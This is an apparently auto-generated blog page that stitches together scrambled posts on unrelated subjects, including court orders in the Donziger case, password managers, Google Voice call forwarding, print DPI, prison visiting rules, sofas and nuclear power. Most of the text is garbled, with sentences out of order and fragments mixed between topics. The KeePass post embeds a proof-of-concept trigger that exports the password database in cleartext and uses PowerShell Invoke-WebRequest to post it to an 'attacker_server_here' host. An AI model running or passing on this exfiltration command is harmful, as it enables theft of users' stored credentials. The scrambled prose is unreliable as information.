AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
Rita glavin donziger1/2/2024 In light of this history, but cognizant of the fact that it is both Mr. Donziger has repeatedly requested adjournments of the trial date throughout his now more than 500 days of home confinement. Donziger's initial appearance and that same number of days since Mr. Donziger's current request (to which the Government does not object) to adjourn the trial date to May 10, 2021, some 643 days from Mr. ( Status Conference set for at 11:00 AM in Courtroom 12A, 500 Pearl Street, New York, NY 10007 before Judge Loretta A. His counsel may attend the conference remotely. for a conference on representation issues and trial witnesses. Donziger shall appear in Courtroom 12A on Thursday, September 17 at 11:00 a.m. Donziger is the party who moved to postpone the start of trial on September 9, the period between September 9 and November 3 shall be excluded from computation under the Speedy Trial Act, to the extent that it applies, in the interest of justice. 169.) With respect to the first request, the Court finds that because Mr. ORDER: The Court is in receipt of the Government's letter asking the Court to (i) exclude time under the Speedy Trial Act from September 9 until the start of trial on November 3 and (ii) schedule a conference to confirm Mr. Donziger's trial defense, which will commence on September 9, 2020, just as it was scheduled to when Mr. Frisch is hereby put on notice that he may be called on to handle Mr. Although it remains to be seen how this situation will play out, out of an abundance of caution and so that he can plan, Mr. Donziger's counsel-i.e., that his withdrawal "not affect the trial date"-would not be satisfied, and the Court's order conditionally allowing his withdrawal would be null and void. Littlepage that the Court might find to exist, the condition on which the Court permitted Mr. Donziger declines to waive any potential conflict with respect to Mr. Donziger finds that unacceptable, or if Mr. Donziger's current counsel declines to attend the long-scheduled trial in person and Mr. Donziger's attorney at the trial long scheduled to begin on Septemas further set forth herein. Donziger's former lead counsel, Andrew Frisch, who has been conditionally allowed to withdraw, on notice that he may be required to serve as Mr. ORDER: In an abundance of caution, this order is issued to put Mr. So Ordered (Status Conference set for at 11:00 AM in Courtroom 12A, 500 Pearl Street, New York, NY 10007 before Judge Loretta A. to perform a demonstration of the platforms that can allow non- attending lawyers to participate in trial proceedings remotely. Following the Curcio hearing, the Court invites the vendors mentioned in the Government's letter of August 14 (dkt. Donziger as part of the Curcio inquiry by August 21. Defense counsel and the special prosecutors may attend in person or via videoconference.1 As is the practice in this Court, the special prosecutors are invited to propose questions for the Court to pose to Mr. 1982) to address potential conflicts of interest with respect to his attorneys. on Augfor a conference pursuant to United States v. Donziger shall appear in Courtroom 12A, or such other courtroom as the Court may designate, at 11:00 a.m.
0 Comments
Read More
Back to Blog
Keepass classic1/2/2024 These definitely aren't the only options out there. But for many users, it can be an important part of keeping your digital life secured. Using a password manager that you trust alongside complex passwords is not a substitute for taking other security precautions, nor is it foolproof. Visit their forum to learn more about the software, or to pose any questions you may have. Bitwarden is open source and released under a GPLv3 license, and the Bitwarden community is vibrant and inviting. You can create a Bitwarden account for free. If you prefer, you can even host your own instance. You can access your sensitive data from a "web vault" in your browser, too, so you're never without the information you need.I The data is fully encrypted end-to-end with AES-256. You can also integrate Bitwarden into your favorite web browser (including Firefox, Chrome, Opera, Safari, Microsoft Edge, and others). Bitwardenīitwarden offers an easy and safe way for teams and individuals to store and share sensitive data, and it works on all major platforms and devices. Licensed under the GPL Affero version 3 license, you can check out the source code on GitHub or view the project's roadmap for a list of current features and more on what is planned. Based on OpenPGP, you can check out its online demo which shows off some of the features (you'll need to install the plugin for your browser, though). Passbolt is another relatively new option, with plugins available for Firefox and Chrome and mobile and command-line options on the way. The project also has developed a cloud backend, also open source, which is a welcome addition to anyone tired of managing password files or setting up syncing across multiple computers. Its source is available on GitHub under a GPLv3 license. Currently available for Linux, Windows, Mac, iOS, and Android, with a ChromeOS client in the works, Padlock is designed as a "minimalist" password manager. Padlock is a very new entrant into the world of open source password managers. In fact, the list of unofficial releases of KeePass covers ports to just about every system in common use. KeyPassX is compatible with KeePass 2 password files, and has also been ported to run on different operating systems. KeePassX, which started as a Linux port of KeePass, is another project you may consider. More on KeePass can be found in this past article from Ricardo Frydman. Designed for desktop use, there are plugins that allow direct use from your web browser, and it can run from a USB stick if you'd prefer to physically carry your passwords from machine to machine. KeePass offers multiple strong encryption options, easy exports, multiple user keys, advanced searching features, and more. KeePass is a GPLv2-licensed password manager, primarily designed for Windows but also running elsewhere. So without further ado, here are a few open source password managers we hope you will consider. And with passwords, being able to audit the source code of your password manager is especially important, as it helps ensure that your passwords are encrypted properly and are not vulnerable to backdoors. While proprietary commercial solutions like LastPass are popular, there are several open source solutions as well. Perhaps the easiest way to keep track of these complex, unique passwords is with a password manager, which provides easy access to strong encryption. And don't even think about writing a password down in plain text, whether in the physical world or the digital. But how could a normal person remember the hundreds or even thousands of individual passwords associated with each account they've ever created? The short answer is: they can't. The best passwords are long, random or pseudo-random combinations of every possible character allowed, with a different password for each unique use. At this point, almost every variation of words and phrases strung together with a few numbers or substitutions is simply too easy for a password cracking tool to make its way through, and the shorter the password, the easier. Unfortunately, "Pa$$w0rd!" isn't secure in any meaningful way, either. Or perhaps a user offers up just enough variation on the classic password selection to get past the minimal rules of the service. Yet no matter how many times it is said, it seems like a week doesn't go by where a high-profile hacking story hits the news, revealing that users of the service in question more often than not had such secure passwords as "12345" or "password" as the only wall of protection on their account. Maintaining complex, unique passwords for each site and service you use is among the most common pieces of advice that security professionals provide to the public every year.
Back to Blog
Google voice send sms via email1/2/2024 Sometimes, you may want to contact someone but there is an available phone nearby. Most of us, at one time or another, must experience that texting from a tiny cell phone may be time-consuming and inconvenient. You can turn this option off any time, and we'll stop using your messages.Effective Ways to Send Text Messages from Computer to Phone Your account information won't be attached to your voicemails, and no one will listen to your voicemails because machines analyze them. You can donate your voicemails to help us improve the programs. Help make voicemail transcripts more accurateĬomputer programs automatically transcribe voicemail. To turn off conditional call forwarding, enter *73 on your phone’s keypad, wait for the confirmation stutter tone, then hang up. After entering each command, tap Send or Call, hang up, and enter the next command: To turn off conditional call forwarding, enter the following 3 commands one at a time on your phone’s keypad, and wait for confirmation. To turn off conditional call forwarding, use the appropriate commands for your mobile carrier or use your carrier’s website to make the change. If you stop using Google Voice, you should turn off conditional call forwarding on your phone. To turn on conditional call forwarding, enter *71 1234567890 on your phone’s keypad, wait for the confirmation stutter tone, then hang up. Verizon Wireless has 2 methods to control conditional call forwarding: star (*) commands, or a menu on their customer website. Replace 1234567890 with your Google Voice number. After entering each command, tap Send or Call, hang up, and enter the next command. To turn on conditional call forwarding, enter the following 3 commands one at a time on your phone’s keypad, and wait for confirmation. On your mobile phone’s keypad, not the Google Voice app keypad, enter the appropriate commands, using your Google Voice number as the forwarding destination. Contact your service provider to learn more. Some traditional or VoIP service providers also support this feature. Note: If you have more than one phone number linked to your Google Voice number, you need to set up conditional call forwarding on every linked number. Plans on these service providers may not support conditional call forwarding. Some mobile service providers are subsidiaries or resellers of the major carriers’ service. For the most accurate information, contact your mobile carrier and ask for their conditional call forwarding commands. To send busy or unanswered calls to your Google Voice voicemail, set up this feature on your mobile number.Įach mobile phone carrier uses a set of star (*) commands to turn conditional call forwarding on or off. Most mobile phone carriers provide a feature called Conditional Call Forwarding (CCF) or No answer/busy transfer. Use Google Voice voicemail instead of your phone's voicemail If you use your carrier's voicemail on more than one phone, you can use Google voicemail instead to check them all at once. When your mobile phone number is busy or you don't answer, you can send the calls to your Google voicemail instead of your phone's voicemail. Learn more about Google Voice account types. Important: This feature isn't available for Voice for Google Workspace accounts managed by your work or school.
Back to Blog
Upon successful completion Instructors will receive an Official IPC Certification valid for 2 years as well as a set of Instructional materials necessary for conducting Certified IPC Specialist Training. Instructors must score an 80% or better and no single score less than 70%. The program for Certified IPC Instructor- As part of the requirements for instructor certification, students will have added instruction on conducting a training class, how to set up a class in the IPC Portal, creating an invoice, and all other elements necessary for the success of the Instructor. Butt joints are fabricated by first by cutting the abrasive belt to the desired length, and then preparing both ends of the piece on the cloth side to accept adhesive bonding. Upon successful completion students will receive an Official IPC Certification valid for 2 years. The other basic type of coated abrasive belt splices is known as a butt joint. Students must score a 70% or better on each module. A listed compression splice for grounding is what you need (yes it will need. Testing for this program for IPC Specialists is all OPEN BOOK exam. In this video, I show you a cheap and easy way to drive a typical 8 copper. Unit 1.3 - Power Cable Splicing consistsof 12 lessons requiring 238 hours of. The program for Certified IPC Specialists is divided into 8 Modules each covering a different area of cable and harness assembly. construction electrician/power And cOmmunications cible splicing are. There is an additional day of training added for the Certified IPC Instructor which covers training the trainer, and responsibilities of the Instructor. This is a comprehensive, 3-day, lecture and exam course that teaches students the accept/reject criteria in the IPC-A-620, for all three classes of cable and wire harness assembly. Use the IPC/WHMA-A-620 to ensure the quality of cable and wire harness assemblies. It contains accept/reject criteria as well as hands-on procedures. The IPC/WHMA-A-620 is the most widely used inspection specification for the cable and wire harness assembly industry.
Back to Blog
Print limit columbus tech1/2/2024 The printer, and ink used in the printer, can also affect print output. The pixels in the image are larger, resulting in a pixelated, almost unprintable, image. This will increase the DPI, but it won’t change or increase the quality of the image. Often, these other factors can have more impact on quality and resolution.įor example, sometimes users will change the resolution of an image in software like Photoshop. Other Factors That Influence Print QualityĭPI isn’t the only factor that determines the resolution and print quality. Only professional photographers or artists with highly detailed work will need resolution that high. You won’t be able to see any difference between documents. Any print above 1,200dpi will deliver improvements that are practically unnoticeable to the naked eye. Keep in mind, there are diminishing returns for increasing the resolution of an image. Professional print services are often the best solution for high-resolution images. Many desktop printers can’t reproduce high-quality and high-resolution images. Storing high-resolution images can quickly fill a hard drive or server. High-resolution images require more memory to store and can take longer to scan. Most businesses consider 600dpi and higher to be a high-resolution image or print. Booklets, pamphlets, reports, and sales sheets should all be printed at 250dpi-300dpi or more.Ī good rule to follow is when in doubt, select a higher dpi for your material. Any marketing material or collateral produced should be, at a minimum, 300dpi. You might be able to get away with 250dpi if you are less concerned with the quality and resolution of the printing. The industry standard for quality photographs and image is typically 300dpi.įor businesses, producing an external document like a brochure, a booklet, or a flyer requires 300dpi. Medium-resolution images have between 200dpi-300dpi. After all, the printing quality needs to represent your business. Internal office communication can be reproduced with a low resolution, but anything used outside the office should be higher than 150dpi. Low-resolution images will have blurring and pixelation after printing.įor business purposes, low-resolution images are suitable for scanning text documents and storing records digitally. For print, 150dpi is considered low-quality printing, even though 72dpi is considered the standard for the web (which is why it’s not easy printing quality images straight from the web). Low-resolution images are considered 150dpi and less. Keep in mind, you’ll need a better, and more capable, printer or print service to deliver higher-quality and high-resolution printing output. Let’s review a few standards and guidelines for using DPI in printing services. This is due to the limited range of colors in a print job. Typically, a printer must offer a higher DPI to match the color quality and resolution of a video display PPI. Similarly, a monitor will measure the pixels per inch, or PPI, of a video display. The ink will spread on the page, making the edges look fuzzy. No matter how powerful your printer is, a low-resolution image doesn’t provide enough raw data to produce high-quality images. You can get more detail and greater resolution from an image with higher DPI.Ī lower DPI will produce an image with fewer dots in printing. A higher resolution image provides the printer and printing device more information. The higher the DPI, the sharper the image. Typically, DPI is the measure of the number of dots that can be placed in a line across one inch, or 2.54 centimeters. The higher the dot density, the higher the resolution of the print or scan. What Is DPI and How Is It Used?ĭPI, or dots per inch, is a measure of the resolution of a printed document or digital scan. We’ll also look at DPI as a baseline measure for certain industries and requirements, so you can scale and budget your services. We’ll look at dots per inch, or DPI, and how businesses can use it to determine the scope and requirements of printing and scanning services. Implementing the wrong solution can put your business at risk and leave employees struggling with an inadequate solution. Investing in the wrong technology or services can mean wasted money. Balancing cost and output, and ensuring the right resources are applied to the requirements, isn’t always easy. For businesses investing in printing and scanning resources, it’s important to understand the project requirements.
Back to Blog
Cdcr visitme1/2/2024 VSA is easy to use and gives users instant confirmation of their request. Please see the Facility Status Page for CHCF-specific visiting instructions.Īpproved visitors must use the Visitation Scheduling Application (VSA) to schedule video visits unless otherwise noted. on the week of the proposed visit by emailing the institution directly at or through the Visitation Scheduling Application (VSA). In-person visits at California Health Care Facility-Stockton (CHCF) may be made beginning Saturday at 8 a.m. See our TransMetro Bus Service page to learn more and register for a ride Any approved visitor may use this service. Additionally, the Department offers free bus transportation to and from all adult institutions in partnership with TransMETRO. Audio calls made from standard institution wall phones and tablets are always free of charge. Incarcerated people with tablets are eligible for 15 minutes of free video calls from their tablet every two weeks. Camp visits are scheduled through email or phone.ĬDCR will continue to provide ways to communicate with friends and family through tablets and phone calls. In-person visiting will be offered every Friday, Saturday and Sunday at all adult institutions and will continue to be scheduled online through the Department’s Visitation Scheduling Application (VSA). Conservation camps will continue hybrid video visiting and in-person on Saturdays and Sundays as they do not have three days of visiting. Weekend video visiting will no longer be offered at any adult institution as of July 7, 2023. The prisoner may independently appeal the denial of approval by utilizing the normal prisoner appeal process within the prison.Video Visiting Frequently Asked Questions (For Fire Camps Only)īeginning Saturday, July 7, 2023, institutions statewide will move to three days of in-person weekend visiting. Box 942883, Sacramento, California, 94283-0001, Attention: Director, Room 351-NĪ written response to appeals addressed to the Director shall be provided within 20 working days from the date of receipt. If dissatisfied with the institution’s response or action, you may refer your appeal, with a copy of the institution’s decision, to the Director of the Division of Adult Institutions or his/her designee at: California Department of Corrections and Rehabilitation, Division of Adult Institutions, P. He/she is required to respond to your appeal within 15 working days of receiving the appeal. If you do not agree with the reason given for the disapproval, you may appeal by writing to the Warden at the prison. Sometimes the reason for denial is that the prison requires additional information (for example, evidence that the applicant is no longer on probation) in those cases, you should resubmit the questionnaire and provide the additional information. If the reason for the denial is based on inaccurate or incomplete information on the Visitor Questionnaire, you may resubmit an accurate and complete questionnaire. If you are denied approval to visit, you may reapply, you may appeal the denial and/or the prisoner may appeal the denial. If you are disapproved, you will receive a letter from the prison setting forth the reason for disapproval the prisoner will also receive notice of the disapproval but will not be given the reason. Once approved, you are listed in the computer as being an approved visitor for the incarcerated person you do not need to bring any proof of approval with you to the prison. If you are approved to visit, the incarcerated person is notified and they must notify you. Step 4: Receive Notice of Approval or Disapproval
Back to Blog
Memory fragments destiny 2 warmind1/2/2024 Go inside and walk to the end where there’s sand piled up. Now head northeast to the other open door just over the hill.
Back to Blog
Utopia cloud couch1/2/2024 Here’s the RH Cloud couch everyone is obsessing over: In order to get the same amount of cozy and the same amount of impeccable style, we set out to find the very best lookalikes that will leave your wallet on cloud 9. In fact, we’re currently in love with their stunning and oh-so-cozy cloud sofa collection but the whopping price tags on all their cloud couch configurations left us totally dumbfounded. "You wanna know that it's going to stand the test of time.You don’t need to spend a fortune to have a comfortable and stylish sofa – these cloud couch lookalikes finds are just as good as Restoration Hardware!Ĭozy up with these cloud couch & sofa lookalikes! ☁️Īlmost any homeowner would love to have a house decked out with Restoration Hardware goodies, but for most of us, their gorgeous and insanely expensive pieces are something we only dream of. "You don't wanna settle for something just to fill the space," she said. Guyton said it's worth the wait to get what you want. Many of the recommended sofas on our list aren't shipping for several months due to lingering supply chain issues and high demand. That way, if you don't like it or it doesn't fit, you can send it back with minimal hassle. Then, London said, look for a retailer with a really good return policy. "The higher the better, but for upholstery, I wouldn't dip below 30,000 for lightly used pieces and 50,000 for more heavily utilized sofas." "Look at the wyzenbeek test on a fabric's durability," said Parker & Harlow Interiors' Paige Gray. Some retailers also provide information on how much wear and tear a sofa can withstand. You'll also want to pay attention to measurements, including width, seat depth, and seat height. "If I can't take a comfortable nap on my sofa, then I'm not going to invest in it," she said. The first thing to pay attention to is how people describe the comfort, said Guyton. What are some tips for buying a couch online?īoth London and Guyton say looking at consumer reviews is crucial, especially if they include images of the couch in their home. Otherwise, you may end up with a comfy couch you don't actually feel comfortable sitting in, she said. If you're looking for an everyday sofa, you might want to go with a darker color. "You definitely have to be mindful of that with shedding pets and kids and markers and all of that," said Guyton. Then there's the white or linen color you often see on the Cloud couch. People with mobility or joint issues may want something higher and less deep as well. "The female clients I have, they don't wanna feel like a little kid with their feet dangling off the sofa," she said. The deeper seat and 18.5-inch height of the Cloud Sofa's cushions might not be for everyone, said Guyton. "If you have good bones in a sofa, you can constantly reupholster the sofa throughout its lifetime," he said.Īre there any features of the RH Cloud Sofa to avoid? More generally, though, London said he likes his own RH sofa because it's lasted a long time, and he's updated it with new fabric as his tastes change. "So that is a great way to do it on a budget." "By doing that, you are adding more of the bounce factor and the comfortability," said London. If you don't want to get a whole new couch, you could look into new pillows for your existing one instead. "It has huge pillow backs" with down filling, he said, so if you want that softness, that's what you should look for. London said mimicking the pillows is the most important future. What should I look for if I want a less expensive version of the RH Cloud Sofa? "I mean, the sofa is basically one huge pillow." "It is like sitting on a cloud," said Studio London Co.'s Travis London. "The Cloud Sofa's everywhere," said Guyton.Īnd it is as comfortable as it looks. Diners at RH's rooftop restaurant have to first make their way through the showroom. It helps that they may have seen it and sat on it in person. People love how oversized and comfortable it is. "It's one of those products that's like truly an experience," said Blessed Little Bungalow's Amber Guyton.
Back to Blog
Keepass 1 vs 21/2/2024 KeePass 2.4.1 allows CSV injection in the title field of a CSV export. This flaw allows an attacker to interact and read sensitive passwords and logs. Thanks to its versatility, the program can be easily carried on a USB flash drive, so you can always carry your safe with you. The vulnerability occurs due to logging the plain text passwords in system log and leads to an Information Exposure vulnerability. KeePass is an excellent password management tool, thanks to which you will be able to have a real safe inside your computer, in which you can store your most sensitive information. Usernames, notes, URLs, everything will be protected. In addition, all information within the database is protected, not just passwords. Please use the 1.11 release in Testing Bits as MikeT mentioned. Both are considered very secure and, in fact, the former is approved by the National Security Agency (NSA) to manage secret information. You can absolutely get your Keepass 2 XML export converted and imported into 1Password. Securely generate, store, and fill passwords and much more. It is important to note that KeePass uses Advanced Encryption Standard (AES) and Twofish algorithms to encrypt its databases. 1Password is the best password manager and secure wallet for Mac, Windows, iOS, and Android. The basic information for each entry includes the name and secure password you want to store, but you can also add much more information, such as expiration date, URL or various notes. Within each category you can add as many entries as you like. Choose RoboForm HTML as format and select the HTML file you just exported, then click OK. Open your KeePass 2.x database file and go File Import. Choose a location and file name, and click Save. In the left menu of KeePass you will find shortcuts to the different categories: general, Windows, networks, Internet, mail, and banking information. Pros Excellent security Multifactor authentication (MFA) 100+ plugins available Portable database storage option Always free Cons Difficult to use for less tech-savvy users Dated, nonintuitive. In the dialog that opens, click the Save button. Once the master key has been created, you can start managing your database. Ideally, use a password that you know you will never forget or, better yet, write this password down on a piece of paper or in a notebook to keep this information safe. Argon2id also took 2 mins with lots of background apps crashing on the 1st attempt, 50+ secs with still lots of crashes on 2nd and 3rd attempt, but. On phone, Argon2d first took 2 mins, then 30 secs, then just 10-15 secs on subsequent attempts. It is important not to forget this password, as without it you will not be able to open your virtual safe. On PC, Argon2d first took 2 mins, then 9 secs, but on the 3rd time, its just a mere 2 seconds. When you launch KeePass for the first time, the first step is to create the aforementioned master key. All your accounts, passwords and privileged information will be locked inside a safe that only you can access with your master key. (*) KeePass 2.53.KeePass is a lightweight, free and open source password management app that allows you to store your most sensitive information completely securely. KeePass2Android is often recommended (I dont have personal experience with it). (*) KeePass disputes report of flaw that could exfiltrate a database (Steve Zurier) Kee Pass is more powerful and customizable. The installer and the portable version are described in detail below. 2.6.6 (151 reviews): 'Modern, secure, and cross-platform password manager compatible with KeePass' 2.6.6+dfsg. It allows users to remember 1 single complex password in. KeePass-2.xx.zip: A KeePass ZIP package (portable version). KeePass works extremely well for personal work passwords and personal-use passwords for home. Further readings (*) What this KeePass CVE means for organizations searching for new password vaults (Carlos Perez) General information When downloading KeePass, you have the choice between 3 different packages: : An installer program for Windows. Removed the 'Export - No Key Repeat' application policy flag KeePass now always asks for the current master key when trying to export data. (2) Victim will open the keePass as normally activity, saving changes, etc., the trigger will executed on background exfiltrating the credentials to attacker server Trigger PoC detailsĪ) The trigger will export the keepass database in KeePass XML (2.x) format included all the credentials (cleartext) into folowing path, e.g: raw - Method POST - Body ( :: ToBase64String ( :: ReadAllBytes ( 'c:\Users\John\AppData\Local\Temp\exploit.xml' ) ) ) False ex bypass - noprofile - c Invoke- WebRequest - uri http :// attacker_server_here/ exploit. We recommend that you choose one of our top-rated password managers instead. D5prW87VRr65NO2xP5RIIg= c: \Users \John \AppData \Local \Temp \exploit.xml That said, KeePass’ rating is already only 2.5 stars.
Back to Blog
Uranium nuclear fission equation1/1/2024 While fuel waste remains a challenge, it is not an insurmountable one.ĭespite these advances, prominent critics of nuclear energy, notably Marc Z. Most of these new reactor designs use molten salts for cooling rather than water, which is more heat efficient and removes the need for expensive and potentially dangerous high-pressure lines. New reactors are smaller and modular, allowing standardized units to be manufactured off-site at a lower cost. The emerging technology - some of which could be on the grid in this decade - addresses many of the significant shortcomings that plagued conventional reactors over the past 50 years. A recent article by Jonathan Rauch in The Atlantic details the work of several well-funded start-ups developing the next generation of nuclear reactors. John Maynard Keynes famously said, "When the facts change, I change my mind - what do you do, sir?" And indeed, the facts about nuclear power have changed considerably. I eventually realized the weight of opinion from writers and leaders I respected was falling decisively on the side of "no nukes." Until it was proven otherwise, renewables were the answer. The technologies have improved at a dazzling rate, driving down the bottom-line cost of electricity to less than that of fossil fuels in many cases.Īs I was drawn into climate activism 10 years ago, I wavered on the nuclear question. There is no fuel cost and no toxic waste. Renewables, especially wind and solar, have obvious advantages. Spent nuclear fuel remains toxic for millennia, the power plants are targets for terrorists, the capital costs make it uneconomic, and it can take 20 years to design, permit and build a power station. Renewable energy advocates viewed nuclear power as a competitor, and they marshaled some compelling arguments against it. If the goal was to cut carbon, the nuclear option had to be on the table. The lifecycle carbon emissions of nuclear energy, including the mining and processing of uranium, are far less than those of fossil fuels, which release greenhouse gases when burned. One of the reasons Pilgrim Nuclear Power Station in Plymouth permanently shut down in 2019 was its inability to compete with low gas prices.īut the emergence of the climate crisis changed the equation. Gas, rather than nuclear, replaced New England's retired nuclear plants and aging coal-fired plants, which accounts for the region's overdependence on gas today. And the regulatory obstacles for gas-fired plants were far less onerous than for a nuclear plant. Fracking took off in the 1990s, making gas cheap and abundant. The growth of natural gas production was another cause of nuclear power's decline. The Seabrook plant exemplified both, with its completion arriving a decade later than projected and its final cost running roughly seven times the original estimate. Moreover, the nuclear industry had been plagued by delays and cost overruns. The Chernobyl disaster occurred in April 1986. had lost its appetite for building nuclear power plants, and Three Mile Island was not the sole reason. Anti-nuclear power demonstrators march toward the front gate of the Seabrook, N.H., nuclear power station construction site Saturday, April 30, 1977. The words "No Evacuation Possible" in foot-high red lettering across a dilapidated barn on a well-traveled road in Newburyport regularly reminded me of the Seabrook controversy and reaffirmed my animus against nuclear energy. Being against splitting atoms slotted into the same ideological bundle. Left-leaning young people like myself embraced a post-Vietnam political orthodoxy that included feminism, environmentalism and resistance to apartheid. When a reactor at Three Mile Island in Pennsylvania partially melted down two years later, opposition to nuclear power became a reflex. A nebulous association between nuclear weapons and nuclear plants only added to my indignation. I shared their belief that the Seabrook plant was unsafe, unnecessary and unwelcome. Many New Englanders of a certain age will recall their slogans: "Go Fishing, Not Fission" and "Better active today than radioactive tomorrow.”Īs a wide-eyed college sophomore, I admired the protesters' resolve and their righteous stance against nuclear power. More than 2,000 demonstrators peacefully occupied the New Hampshire building site in May of that year, resulting in one of the largest mass arrests in the nation's history. I remember distinctly the protests during the construction of the Seabrook Station Nuclear Power Plant in 1977. Facebook Email A pro-nuclear activist demonstrates outside the European Parliament Jin Strasbourg, eastern France. |